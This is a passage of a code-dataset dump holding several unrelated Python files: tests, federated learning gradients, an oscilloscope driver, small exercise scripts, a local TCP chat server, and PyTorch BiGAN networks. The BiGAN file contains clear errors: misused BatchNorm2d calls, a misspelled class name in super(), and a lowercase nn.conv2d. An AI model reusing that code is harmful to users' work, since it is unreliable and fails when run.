self.assertEqual(len(recs), len(srcdata), \"save returned record count differs\")\n dcount = util.runCoroutine(rmgr.delete(profile_ids=[2562399]))\n self.assertEqual(dcount, 1, \"delete returned record count differs\")\n dbrecs = util.runCoroutine(self.entmgr.find(self.entityName))\n self.assertEqual(len(dbrecs), len(srcdata) - 1, \"db record count differs\")\n xdata = [_ for _ in srcdata if _[\"profile_id\"] != 2562399]\n self.assertEqual(dbrecs, xdata, \"db records differ\")\n\nclass MockRosterManagerFacade(RosterManagerFacade):\n def __init__(self, entityManager : EntityManager, apiClient : nflapi.Client.Client, findData : List[dict]):\n super(MockRosterManagerFacade, self).__init__(entityManager, apiClient)\n self._find_data = findData\n\n async def find(self, *args) -> List[dict]:\n return self._find_data.copy()\n\nclass MockApiClient(nflapi.Client.Client):\n def __init__(self, profileData : List[dict]):\n self._profile_data = dict(zip([_[\"profile_id\"] for _ in profileData], profileData))\n self._req_rosters = []\n\n def getPlayerProfile(self, rosters : List[str]) -> List[dict]:\n self._req_rosters = rosters\n data = []\n for pid in [_[\"profile_id\"] for _ in rosters]:\n if pid in self._profile_data:\n data.append(self._profile_data[pid])\n return data\n\n def getRequestedRosters(self) -> List[dict]:\n return self._req_rosters\n","sub_path":"tests/TestPlayerProfileManagerFacade.py","file_name":"TestPlayerProfileManagerFacade.py","file_ext":"py","file_size_in_byte":12834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"4745865","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2021 Tianmian Tech. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Copyright 2019 The FATE Authors. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\nimport functools\nimport random\n\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom common.python.utils import log_utils\nfrom kernel.base.sparse_vector import SparseVector\nfrom kernel.components.lr.vertlr.sync import loss_sync\nfrom kernel.optimizer.activation import sigmoid\nfrom kernel.utils import base_operator\nfrom kernel.utils import consts\nfrom kernel.utils import data_util\nfrom kernel.utils.base_operator import vec_dot\nfrom kernel.utils.random_number_generator import RandomNumberGenerator\n\nLOGGER = log_utils.get_logger()\n\n\ndef __compute_partition_gradient(data, fit_intercept=True, is_sparse=False):\n \"\"\"\n Compute vert regression gradient for:\n gradient = ∑d*x, where d is fore_gradient which differ from different algorithm\n Parameters\n ----------\n data: DSource, include fore_gradient and features\n fit_intercept: bool, if model has interception or not. Default True\n\n Returns\n ----------\n numpy.ndarray\n vert regression model gradient\n \"\"\"\n # LOGGER.debug(\"enter __compute_partition_gradient\")\n feature = []\n fore_gradient = []\n\n if is_sparse:\n row_indice = []\n col_indice = []\n data_value = []\n\n row = 0\n feature_shape = None\n for key, (sparse_features, d) in data:\n fore_gradient.append(d)\n assert isinstance(sparse_features, SparseVector)\n if feature_shape is None:\n feature_shape = sparse_features.get_shape()\n for idx, v in sparse_features.get_all_data():\n col_indice.append(idx)\n row_indice.append(row)\n data_value.append(v)\n row += 1\n if feature_shape is None or feature_shape == 0:\n return 0\n sparse_matrix = sp.csr_matrix((data_value, (row_indice, col_indice)), shape=(row, feature_shape))\n fore_gradient = np.array(fore_gradient)\n\n # gradient = sparse_matrix.transpose().dot(fore_gradient).tolist()\n gradient = base_operator.dot(sparse_matrix.transpose(), fore_gradient).tolist()\n if fit_intercept:\n bias_grad = np.sum(fore_gradient)\n gradient.append(bias_grad)\n LOGGER.debug(\"In first method, gradient: {}, bias_grad: {}\".format(gradient, bias_grad))\n return np.array(gradient)\n\n else:\n for key, value in data:\n feature.append(value[0])\n fore_gradient.append(value[1])\n feature = np.array(feature)\n fore_gradient = np.array(fore_gradient)\n if feature.shape[0] <= 0:\n return 0\n\n gradient = base_operator.dot(feature.transpose(), fore_gradient)\n gradient = gradient.tolist()\n if fit_intercept:\n bias_grad = np.sum(fore_gradient)\n gradient.append(bias_grad)\n return np.array(gradient)\n\n\ndef compute_gradient(data_instances, fore_gradient, fit_intercept):\n \"\"\"\n Compute vert-regression gradient\n Parameters\n ----------\n data_instances: DSource, input data\n fore_gradient: DSource, fore_gradient\n fit_intercept: bool, if model has intercept or not\n\n Returns\n ----------\n DSource\n the vert regression model's gradient\n \"\"\"\n feat_join_grad = data_instances.join(fore_gradient,\n lambda d, g: (d.features, g))\n is_sparse = data_util.is_sparse_data(data_instances)\n f = functools.partial(__compute_partition_gradient,\n fit_intercept=fit_intercept,\n is_sparse=is_sparse)\n gradient_partition = feat_join_grad.mapPartitions(f)\n gradient_partition = gradient_partition.reduce(lambda x, y: x + y)\n\n gradient = gradient_partition / data_instances.count()\n\n return gradient\n\n\nclass VertGradientBase(object):\n def federated_compute_gradient_and_loss(self, *args):\n raise NotImplementedError(\"Should not call here\")\n\n def set_total_batch_nums(self, total_batch_nums):\n \"\"\"\t\n Use for sqn gradient.\t\n \"\"\"\n pass\n\n\nclass Promoter(VertGradientBase, loss_sync.Promoter):\n\n def __init__(self):\n self.provider_forwards = None\n self.fore_gradient = None\n self.forwards = None\n # self.aggregated_forwards = None\n\n def _register_gradient_sync(self, provider_weight_transfer, provider_forward_transfer, fore_gradient_transfer,\n provider_gradient_r_transfer, provider_en_gradient_r_transfer):\n self.provider_weight_transfer = provider_weight_transfer\n self.provider_forward_transfer = provider_forward_transfer\n self.fore_gradient_transfer = fore_gradient_transfer\n self.provider_gradient_r_transfer = provider_gradient_r_transfer\n self.provider_en_gradient_r_transfer = provider_en_gradient_r_transfer\n\n def register_gradient_procedure(self, transfer_variables):\n self._register_gradient_sync(transfer_variables.provider_weight,\n transfer_variables.provider_forward_dict,\n transfer_variables.fore_gradient,\n transfer_variables.provider_gradient_r,\n transfer_variables.provider_en_gradient_r)\n\n self._register_loss_sync(transfer_variables.provider_loss_regular)\n\n def compute_fore_gradient(self, data_instances, model_weights, offset=None):\n \"\"\"\n gradient = d.dot(x)\n Define (sigmoid(wx+b) - y) as fore_gradient\n\n \"\"\"\n # X.dot(W)+b\n half_wx = data_instances.mapValues(\n lambda v: vec_dot(v.features, model_weights.coef_) + model_weights.intercept_)\n self.forwards = half_wx\n\n for provider_forward in self.provider_forwards:\n self.forwards = self.forwards.join(provider_forward, lambda g, h: g + h)\n\n y_hat = self.forwards.mapValues(lambda p: sigmoid(p))\n\n fore_gradient = y_hat.join(data_instances, lambda y_hat, d: y_hat - d.label)\n\n return fore_gradient, y_hat\n\n def compute_forward_hess(self, data_instances, delta_s, provider_forwards):\n \"\"\"\n To compute Hessian matrix, y, s are needed.\n g = (1/N)*∑(0.25 * wx - 0.5 * y) * x\n y = ∇2^F(w_t)s_t = g' * s = (1/N)*∑(0.25 * x * s) * x\n define forward_hess = (1/N)*∑(0.25 * x * s)\n \"\"\"\n forwards = data_instances.mapValues(\n lambda v: (np.dot(v.features, delta_s.coef_) + delta_s.intercept_) * 0.25)\n for provider_forward in provider_forwards:\n forwards = forwards.join(provider_forward, lambda g, h: g + (h * 0.25))\n # forward_hess = forwards.mapValues(lambda x: 0.25 * x / sample_size)\n hess_vector = compute_gradient(data_instances, forwards, delta_s.fit_intercept)\n return forwards, np.array(hess_vector)\n\n def compute_and_aggregate_forwards(self, data_instances, model_weights,\n encrypted_calculator, batch_index, offset=None):\n raise NotImplementedError(\"Function should not be called here\")\n\n def federated_compute_gradient_and_loss(self, data_instances, cipher_operator, encrypted_calculator, model_weights,\n optimizer,\n loss_method, n_iter_, batch_index, offset=None):\n \"\"\"\n Linear model gradient core\n Step 1: get provider forwards which differ from different algorithm\n For Logistic Regression and Linear Regression: forwards = wx\n For Poisson Regression, forwards = exp(wx)\n\n Step 2: Compute fore_gradient: d = sigmoid(wx)-y\n\n Step 3: send encrypted fore_gradient: d = [sigmoid(wx)-y]\n\n Step 5: Compute unilateral gradient = ∑d*x,\n\n \"\"\"\n current_suffix = (n_iter_, batch_index)\n\n self.provider_forwards = self.get_provider_forward(suffix=current_suffix)\n\n self.fore_gradient, y_hat = self.compute_fore_gradient(data_instances, model_weights, offset)\n encrypted_fore_gradient = encrypted_calculator[batch_index].encrypt(self.fore_gradient)\n self.remote_fore_gradient(encrypted_fore_gradient, suffix=current_suffix)\n\n self.decrypt_provider_gradient_and_remote(cipher_operator, suffix=current_suffix)\n\n unilateral_gradient = []\n if model_weights:\n unilateral_gradient = compute_gradient(data_instances,\n self.fore_gradient,\n model_weights.fit_intercept)\n if optimizer is not None:\n unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)\n\n gradient = optimizer.apply_gradients(unilateral_gradient)\n\n loss_list = []\n loss_norm = optimizer.loss_norm(model_weights)\n if loss_norm is not None:\n provider_loss_regular = self.get_provider_loss_regular(suffix=current_suffix)\n else:\n provider_loss_regular = []\n\n # if len(self.provider_forwards) > 1:\n # LOGGER.info(\"More than one provider exist, loss is not available\")\n # else:\n y = data_instances.mapValues(lambda instance: instance.label)\n loss = loss_method.compute_loss(y, y_hat)\n\n if loss_norm is not None:\n loss += loss_norm\n for provider_loss_norm in provider_loss_regular:\n loss += provider_loss_norm\n loss_list.append(loss)\n LOGGER.debug(\"In compute_loss, loss list are: {}\".format(loss_list))\n\n return gradient, loss_list\n\n def get_provider_forward(self, suffix=tuple()):\n provider_forward = self.provider_forward_transfer.get(idx=-1, suffix=suffix)\n return provider_forward\n\n def get_provider_weight(self):\n provider_weight = self.provider_weight_transfer.get(idx=-1)\n return provider_weight\n\n def remote_fore_gradient(self, fore_gradient, suffix=tuple()):\n self.fore_gradient_transfer.remote(obj=fore_gradient, role=consts.PROVIDER, idx=-1, suffix=suffix)\n\n def decrypt_provider_gradient_and_remote(self, cipher_operator, suffix=tuple()):\n en_provider_gradient_rs = self.provider_en_gradient_r_transfer.get(idx=-1, suffix=suffix)\n # provider_grad_r = en_provider_gradient_r[0].decrypt(cipher_operator)\n for idx, en_provider_gradient_r in enumerate(en_provider_gradient_rs):\n provider_grad_r = np.array(cipher_operator.decrypt_list(en_provider_gradient_r))\n self.provider_gradient_r_transfer.remote(provider_grad_r,\n role=consts.PROVIDER,\n idx=idx,\n suffix=suffix)\n\n\nclass Provider(VertGradientBase, loss_sync.Provider):\n\n def __init__(self):\n self.forwards = None\n self.fore_gradient = None\n\n def _register_gradient_sync(self, provider_weight_transfer, provider_forward_transfer, fore_gradient_transfer,\n provider_gradient_r_transfer, provider_en_gradient_r_transfer):\n self.provider_weight_transfer = provider_weight_transfer\n self.provider_forward_transfer = provider_forward_transfer\n self.fore_gradient_transfer = fore_gradient_transfer\n self.provider_gradient_r_transfer = provider_gradient_r_transfer\n self.provider_en_gradient_r_transfer = provider_en_gradient_r_transfer\n\n def register_gradient_procedure(self, transfer_variables):\n self._register_gradient_sync(transfer_variables.provider_weight,\n transfer_variables.provider_forward_dict,\n transfer_variables.fore_gradient,\n transfer_variables.provider_gradient_r,\n transfer_variables.provider_en_gradient_r)\n\n self._register_loss_sync(transfer_variables.provider_loss_regular)\n\n def federated_compute_gradient_and_loss(self, data_instances, cipher_operator, encrypted_calculator,\n model_weights, optimizer, n_iter_, batch_index):\n \"\"\"\n Linear model gradient core\n Step 1: compute forwards and send to promoter : forwards = wx + b\n Step 2:get fore_gradient from promoter: d = [sigmoid(wx)-y]\n Step 3: compute gradient and add random r : gradient = (1/n)*∑(d.dot(x))\n\n \"\"\"\n current_suffix = (n_iter_, batch_index)\n self.forwards = self.compute_forwards(data_instances, model_weights)\n self.remote_provider_forward(self.forwards, suffix=current_suffix)\n fore_gradient = self.get_fore_gradient(suffix=current_suffix)\n\n unilateral_gradient = compute_gradient(data_instances,\n fore_gradient,\n model_weights.fit_intercept)\n if optimizer is not None:\n unilateral_gradient = optimizer.add_regular_to_grad(unilateral_gradient, model_weights)\n\n r = RandomNumberGenerator(-1, 1).generate_random_number(unilateral_gradient.shape)\n # r = PaillierTensor(ori_data=r)\n # encrypted_r = r.encrypt(encrypted_calculator[batch_index])\n # en_gradient_r = encrypted_r.__add__(PaillierTensor(unilateral_gradient))\n\n encrypted_r = cipher_operator.recursive_encrypt(r)\n en_gradient_r = encrypted_r + unilateral_gradient\n\n gradient_r = self.sync_gradient_r(en_gradient_r, suffix=current_suffix)\n # gradient = gradient_r - r\n gradient = np.subtract(gradient_r, r)\n gradient = optimizer.apply_gradients(gradient)\n\n loss_regular = optimizer.loss_norm(model_weights)\n norm_r = random.uniform(-loss_regular * 0.1, loss_regular * 0.1)\n loss_regular = loss_regular + norm_r\n # if loss_regular is not None:\n # loss_regular = cipher_operator.encrypt(loss_regular)\n self.remote_loss_regular(loss_regular, suffix=current_suffix)\n\n return gradient, fore_gradient\n\n def compute_sqn_forwards(self, data_instances, delta_s, cipher_operator):\n \"\"\"\n To compute Hessian matrix, y, s are needed.\n g = (1/N)*∑(0.25 * wx - 0.5 * y) * x\n y = ∇2^F(w_t)s_t = g' * s = (1/N)*∑(0.25 * x * s) * x\n define forward_hess = ∑(0.25 * x * s)\n \"\"\"\n sqn_forwards = data_instances.mapValues(\n lambda v: cipher_operator.encrypt(np.dot(v.features, delta_s.coef_) + delta_s.intercept_))\n # forward_sum = sqn_forwards.reduce(reduce_add)\n return sqn_forwards\n\n def compute_forward_hess(self, data_instances, delta_s, forward_hess):\n \"\"\"\n To compute Hessian matrix, y, s are needed.\n g = (1/N)*∑(0.25 * wx - 0.5 * y) * x\n y = ∇2^F(w_t)s_t = g' * s = (1/N)*∑(0.25 * x * s) * x\n define forward_hess = (0.25 * x * s)\n \"\"\"\n hess_vector = compute_gradient(data_instances,\n forward_hess,\n delta_s.fit_intercept)\n return np.array(hess_vector)\n\n def compute_forwards(self, data_instances, model_weights):\n \"\"\"\n forwards = wx\n \"\"\"\n # w = model_weights.coef_.reshape(model_weights.coef_.size)\n wx = data_instances.mapValues(lambda v: vec_dot(v.features, model_weights.coef_) + model_weights.intercept_,\n need_send=True)\n return wx\n\n def remote_provider_forward(self, provider_forward, suffix=tuple()):\n self.provider_forward_transfer.remote(obj=provider_forward, role=consts.PROMOTER, idx=0, suffix=suffix)\n\n def remote_provider_weight(self, provider_weight):\n self.provider_weight_transfer.remote(obj=provider_weight, role=consts.PROMOTER, idx=0)\n\n def get_fore_gradient(self, suffix=tuple()):\n provider_forward = self.fore_gradient_transfer.get(idx=0, suffix=suffix)\n return provider_forward\n\n def sync_gradient_r(self, e_gradient_r, suffix=tuple()):\n self.provider_en_gradient_r_transfer.remote(obj=e_gradient_r, role=consts.PROMOTER, idx=-1, suffix=suffix)\n gradient_r = self.provider_gradient_r_transfer.get(idx=0, suffix=suffix)\n return gradient_r\n","sub_path":"kernel/components/lr/vertlr/sync/vert_lr_gradient_and_loss.py","file_name":"vert_lr_gradient_and_loss.py","file_ext":"py","file_size_in_byte":17626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"93423869","text":"\"\"\"\n\nPython Interchangeable Virtual Instrument Library\n\nCopyright (c) 2012-2016 Alex Forencich\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nfrom .agilent9000 import *\n\nclass agilentMSO9104A(agilent9000):\n \"Agilent Infiniium MSO9104A IVI oscilloscope driver\"\n\n def __init__(self, *args, **kwargs):\n self.__dict__.setdefault('_instrument_id', 'MSO9104A')\n\n super(agilentMSO9104A, self).__init__(*args, **kwargs)\n\n self._analog_channel_count = 4\n self._digital_channel_count = 16\n self._channel_count = self._analog_channel_count + self._digital_channel_count\n self._bandwidth = 1e9\n\n self._init_channels()\n self._add_method('measurement.fetch_waveform_digital', self._measurement_fetch_waveform_digital, ivi.Doc(\"\"\"description goes here\"\"\", cls, grp, '4.3.13'))\n self._add_property('acquisition.analog_sample_rate',\n self._get_acquisition_analog_sample_rate,\n self._set_acquisition_analog_sample_rate,\n None,\n ivi.Doc(\"\"\"\n Returns or sets the effective sample rate of the acquired analog waveform using the\n current configuration. The units are samples per second.\n \"\"\", cls, grp, '4.2.10'))\n\n def _get_acquisition_analog_sample_rate(self):\n if not self._driver_operation_simulate and not self._get_cache_valid():\n self._acquisition__analog_sample_rate = self._ask(\":acquire:srate:analog?\")\n self._set_cache_valid()\n return self._acquisition__analog_sample_rate\n\n def _set_acquisition_analog_sample_rate(self, value):\n value = float(value)\n self._acquisition_analog_sample_rate = value\n\n def _measurement_fetch_waveform_digital(self, index):\n raw_data = []\n\n if self._driver_operation_simulate:\n return list()\n\n self._write(\":waveform:byteorder msbfirst\")\n self._write(\":waveform:format ascii\")\n self._write(\":waveform:source %s\" % index)\n\n # Read preamble\n pre = self._ask(\":waveform:preamble?\").split(',')\n\n xinc = float(pre[4])\n xorg = float(pre[5])\n xref = int(float(pre[6]))\n\n# if format != 0:\n# raise UnexpectedResponseException()\n\n # Read waveform data\n raw_data.append(self._ask(':WAVeform:DATA?'))\n\n # convert string of hex values to list of hex strings\n data_list = raw_data[0].split(\",\")\n\n # convert to times\n data = [((((k-xref)*xinc) + xorg), e) for k,e in enumerate(data_list)]\n\n return data\n\n\n","sub_path":"ivi/agilent/agilentMSO9104A.py","file_name":"agilentMSO9104A.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"587848379","text":"#!/usr/bin/env python\n\nimport random\nfrom functools import reduce\n\n\"\"\"\nСоздать (программно) текстовый файл, записать в него программно набор чисел, разделенных пробелами.\nПрограмма должна подсчитывать сумму чисел в файле и выводить ее на экран.\n\"\"\"\n\nTEXT_FILE = \"task05.txt\"\n\n\ndef init_file(file_name):\n print(f\"Creating file '{file_name}' with numbers...\")\n print()\n lines_count = random.randint(1, 10)\n with open(file_name, \"w\") as t_file:\n for i in range(lines_count):\n numbers = [str(random.randint(1, 100)) for x in range(random.randint(1, 10))]\n print(\" \".join(numbers), file=t_file)\n\n\ndef calculate_sum_in_file(file_name):\n try:\n with open(file_name, \"r\") as t_file:\n total_sum = 0\n for i, line in enumerate(t_file, 1):\n sum_in_line = sum([int(x) for x in line.strip().split()])\n total_sum += sum_in_line\n print(f\"Line No {i}: '{line.strip()}'; sum '{sum_in_line}'\")\n print()\n print(f\"Total sum of numbers in file '{file_name}': {total_sum}\")\n\n except FileNotFoundError:\n print(f\"File '{TEXT_FILE}' not found\")\n exit(1)\n\n\ndef main():\n init_file(TEXT_FILE)\n calculate_sum_in_file(TEXT_FILE)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson-5/task05.py","file_name":"task05.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"16010042","text":"import io\nimport re\n\n# full range(1975, 2001)\nfor i in range(1975, 2001):\n toSort = []\n # open a file to put some year's data in\n weeks = io.open(\"./data/fideTSV/weeks{}.txt\".format(i), \"w\", encoding=\"utf-8\")\n # write the header so d3 can read it in\n weeks.write(\"Name\" + \"\\t\" + \"Rating\" + \"\\t\" + \"Year\" + \"\\t\" + \"Fed\" + \"\\t\" + \"Rank\" + \"\\n\")\n # open each file\n lines = io.open(\"./data/ratings_lists/{}-01.TXT\".format(i), \"r\").readlines()\n # ignore the header\n lines = lines[4:-1]\n # loop through each player\n for player in lines:\n # capture the name\n name = player[re.search(\"[^\\s\\d]+(.\\S+)+\", player).start():re.search(\"[^\\s\\d]+(.\\S+)+\", player).end()]\n if \",\" in name:\n # reorder first/last name and delete the comma if necessary\n first = name[re.search(\", *\", name).end():]\n last = name[0:name.find(\",\")]\n name = first + \" \" + last\n # some names have more than one comma :(\n while \",\" in name:\n name = name.replace(\",\", \"\")\n # capture the rating\n rating = player[re.search(\"[^\\d]\\d{4}[^\\d]\", player).start() + 1:re.search(\"[^\\d]\\d{4}[^\\d]\", player).start() + 5]\n # get the year\n year = i\n # capture the country code\n fed = player[re.search(\"[A-Z]{3}\", player).start():re.search(\"[A-Z]{3}\", player).end()]\n # put all that data into a list element\n toSort.append([name, int(rating), year, fed])\n # after all the players have been added to the list, sort them according to the rating\n allSorted = sorted(toSort, key=lambda x: x[1], reverse=True)\n # once they are sorted, add a rank column\n for k in range(0, len(allSorted)):\n allSorted[k].append(k+1)\n # print(allSorted)\n # print(\"\\n\")\n for k in range(0, len(allSorted)):\n for j in range(0, len(allSorted[k])):\n # write everything to the file\n weeks.write(str(allSorted[k][j]) + \"\\t\")\n weeks.write(\"\\n\")\n","sub_path":"scripts/combine_weeks.py","file_name":"combine_weeks.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"282092513","text":"import socket\n\n# 1.创建Tcp套接字\nscokfd = socket.socket()\n\n# 绑定地址\nscokfd.bind(('127.0.0.1',9999))\n\n# 设置套接字监听\nscokfd.listen(5)\n\n# 等待客户端连接\nprint('等待客户端连接...')\nconnfd,addr = scokfd.accept()\nprint('客户端地址',addr)\nwhile True:\n # 消息收发\n data = connfd.recv(1024)\n # 客户端退出,服务端recv立即返回空字符串\n if not data:\n break\n print('客户端:',data.decode())\n\n a = input('服务端:')\n n = connfd.send(a.encode())\n\n\nconnfd.close()\nscokfd.close()\n\n","sub_path":"03-pythonNet/2019-1-8/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"307654815","text":"import sys\n\ndef main():\n\n\targv = sys.argv\n\targc = len(argv)\n\t\n\trankCounts = getRankCounts()\n\ttotalHands = getTotalHands(rankCounts)\n\n\trankStrings = getRankStrings()\n\tresults = getResults(rankCounts, totalHands)\n\t\n\tprintResults(rankStrings, results)\n\t\ndef getResults(rankCounts, totalHands):\n\t\n\tresults = []\n\t\n\tfor i in range(0, len(rankCounts)):\n\t\tresults.append(rankCounts[i]/totalHands)\n\t\n\treturn results\n\t\ndef printResults(rankStrings, results):\n\t\n\tfor i in range(0, len(results)):\n\t\tsys.stdout.write(\"The probability of \")\n\t\tsys.stdout.write(rankStrings[i])\n\t\tsys.stdout.write(\" is \")\n\t\tsys.stdout.write(\"{:.4f}\".format(results[i]*100))\n\t\tsys.stdout.write(\"%\\n\")\n\t\ndef getTotalHands(rankCounts):\n\tsum = 0\n\tfor i in range(0, len(rankCounts)):\n\t\tsum += rankCounts[i]\n\treturn sum\n\t\ndef getRankStrings():\n\n\trankStrings = []\n\t\n\trankStrings.append(\"nothing\")\n\trankStrings.append(\"one pair\")\n\trankStrings.append(\"two pairs\")\n\trankStrings.append(\"three of a kind\")\n\trankStrings.append(\"a straight\")\n\trankStrings.append(\"a flush\")\n\trankStrings.append(\"a full house\")\n\trankStrings.append(\"four of a kind\")\n\trankStrings.append(\"a straight flush\")\n\trankStrings.append(\"a royal flush\")\n\t\n\treturn rankStrings\n\ndef getRankCounts():\n\t\n\trankCounts = []\n\t\n\tfor i in range(0, 10):\n\t\trankCounts.append(0)\n\t\n\tfor line in sys.stdin:\n\t\trank = getRank(line)\n\t\trankCounts[rank] += 1\n\t\t\n\treturn rankCounts\n\ndef getRank(line):\n\tsplitLine = line.split(\",\")\n\trankString = splitLine[len(splitLine)-1]\n\trank = int(rankString)\n\treturn rank\n\t\nif __name__ == \"__main__\":\n\tmain()","sub_path":"31/poker_31.py","file_name":"poker_31.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"72056592","text":"from micropython import const\n\n# Device\nQOS = const(1)\nMAIN_DELAY = const(1000)\nSTATS_DELAY = const(60000)\nRESTORE_DELAY = const(250)\nWDT_DELAY = const(100)\nDEVICE_STATE = b\"$state\"\n\n# Device states\nSTATE_INIT = b\"init\"\nSTATE_READY = b\"ready\"\nSTATE_RECOVER = b\"recover\"\n\n# Property datatypes\nP_STRING = b\"string\"\n\n# Node\nPUBLISH_DELAY = const(20)\n\n# General\nSLASH = b\"/\"\nUNDERSCORE = b\"_\"\n\nON = b\"on\"\nOFF = b\"off\"\nTRUE = b\"true\"\nFALSE = b\"false\"\nLOCKED = b\"locked\"\nUNLOCKED = b\"unlocked\"\n","sub_path":"homie/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640984378","text":"# Network Architecture for Bigan: Generator, Discriminator, and Encoder\n\nimport torch\nimport torch.nn as nn \nimport numpy as np \nimport torch.nn.functional as F \nfrom torch.nn import Parameter as P \nimport pdb \n\n\nclass Generator(nn.Module):\n def __init__(self, z_dim):\n super(Generator, self).__init__()\n\n self.Activation = nn.ReLU(inplace=True)\n\n self.dense_net = nn.Linear(z_dim, 256*4*4)\n\n self.normalization = nn.BatchNorm2d()\n\n self.deconv1 = nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=3, stride=2, padding=1, bias=True) #4x4 --> 7x7\n\n self.deconv2 = nn.ConvTranspose2d(in_channels=128, out_channels=64, kernel_size=3, stride=2, bias=True) #7x7 --> 15x15\n\n self.deconv3 = nn.ConvTranspose2d(in_channels=64, out_channels=3, kernel_size=4, stride=2, bias=True) #15x15 --> 32x32\n\n\n def forward(self, z):\n\n x = self.dense_net(z)\n x = self.Activation(x)\n \n x = x.view(x.size(0), 256, 4, 4)\n\n x = self.deconv1(x)\n x = self.Activation(x)\n x = self.normalization(128)\n\n x = self.deconv2(x)\n x = self.Activation(x)\n x = self.normalization(64)\n\n x = self.deconv3(x)\n x = torch.tanh(x)\n\n return x\n\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super(Discriminator, self).__init__()\n\n self.Activation = nn.LeakyReLU(inplace=True, negative_slope=0.2)\n\n self.normalization = nn.BatchNorm2d()\n\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=4, stride=2, bias=True)\n\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, stride=2, padding=1, bias=True)\n\n self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, stride=2, padding=1, bias=True)\n\n self.dense_net = nn.Linear(128*4*4, 1)\n\n \n def forward(self, x):\n\n d = self.conv1(x)\n d = self.Activation(d)\n d = self.normalization(d)\n\n d = self.conv2(d)\n d = self.Activation(d)\n d = self.normalization(d)\n\n d = self.conv3(d)\n d = self.Activation(d)\n\n d = d.view(d.size(0), 128*4*4)\n d = self.dense_net(d)\n\n\n return d\n\n\nclass Encoder(nn.Module):\n def __init__(self, z_dim):\n super(Enocder, self).__init__()\n\n self.Activation = nn.LeakyReLU(inplace=True, negative_slope=0.2)\n\n self.normalization = nn.BatchNorm2d()\n\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=64, kernel_size=4, stride=2, bias=True) #32x32 --> 14x14\n \n self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, stride=2, padding=1, bias=True) #14x14 --> 7x7\n\n self.conv3 = nn.conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1, bias=True) #7x7 --> 4x4\n\n self.dense_net = nn.Linear(256*4*4, z_dim)\n\n def forward(self, x):\n\n z = self.conv1(x)\n z = self.Activation(z)\n z = self.normalization(64)\n\n z = self.conv2(z)\n z = self.Activation(z)\n z = self.normalization(128)\n\n z = self.conv3(z)\n z = self.Activation(z)\n\n z = z.view(z.size(0), 256*4*4)\n z = self.dense_net(z)\n\n z = torch.tanh(z)\n\n return z\n\n\n\n","sub_path":"bigan/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"613469973","text":"import logging.config\nimport sys\n\n# I used this dictionary test, you would put:\n# logging.config.fileConfig('logging.conf')\n# The \"\" entry in loggers is the root logger, tutorials always \n# use \"root\" but I can't get that to work\nlogging.config.dictConfig({\n\t\"version\": 1,\n\t\"formatters\": {\n\t\t\"default\": {\n\t\t\t\"format\": \"%(asctime)s 